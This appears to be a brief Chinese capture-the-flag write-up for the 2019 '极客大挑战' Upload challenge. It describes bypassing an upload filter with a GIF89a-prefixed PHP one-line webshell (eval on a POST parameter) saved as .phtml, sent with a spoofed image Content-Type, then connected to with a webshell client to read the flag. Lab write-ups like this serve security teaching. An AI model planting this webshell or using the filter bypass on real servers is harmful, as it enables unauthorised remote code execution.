[极客大挑战 2019]Upload
[极客大挑战 2019]Upload
wp from Kuller_Yan
一道很简单的文件上传漏洞:
打开靶机看到很直观的页面让我们上传。随便上传一个一句话木马,发现
![[极客大挑战 2019]Upload_第1张图片](http://img.e-com-net.com/image/info8/56a590420c32410a92274962f25c0eed.jpg)
看来type必须是图片,那我们构建一个phtml文件
GIF89a
<script language="php">eval($_POST['123']);</script>
在上传的时候抓包,更改类型;image/jpeg
![[极客大挑战 2019]Upload_第2张图片](http://img.e-com-net.com/image/info8/a66b5e8c1f5b4fc39012a954388c4837.jpg)
然后盲猜url为/upload
访问http://29f56e21-5b5a-4212-ae3d-6d643a261edf.node3.buuoj.cn/upload/159623.phtml
![[极客大挑战 2019]Upload_第3张图片](http://img.e-com-net.com/image/info8/6802e381db7744a0bbc5abf202cabdb6.jpg)
然后就直接蚁剑(菜刀也行)连接,在根目录发现flag
![[极客大挑战 2019]Upload_第4张图片](http://img.e-com-net.com/image/info8/523947f5a410409ba69103448385ef0d.jpg)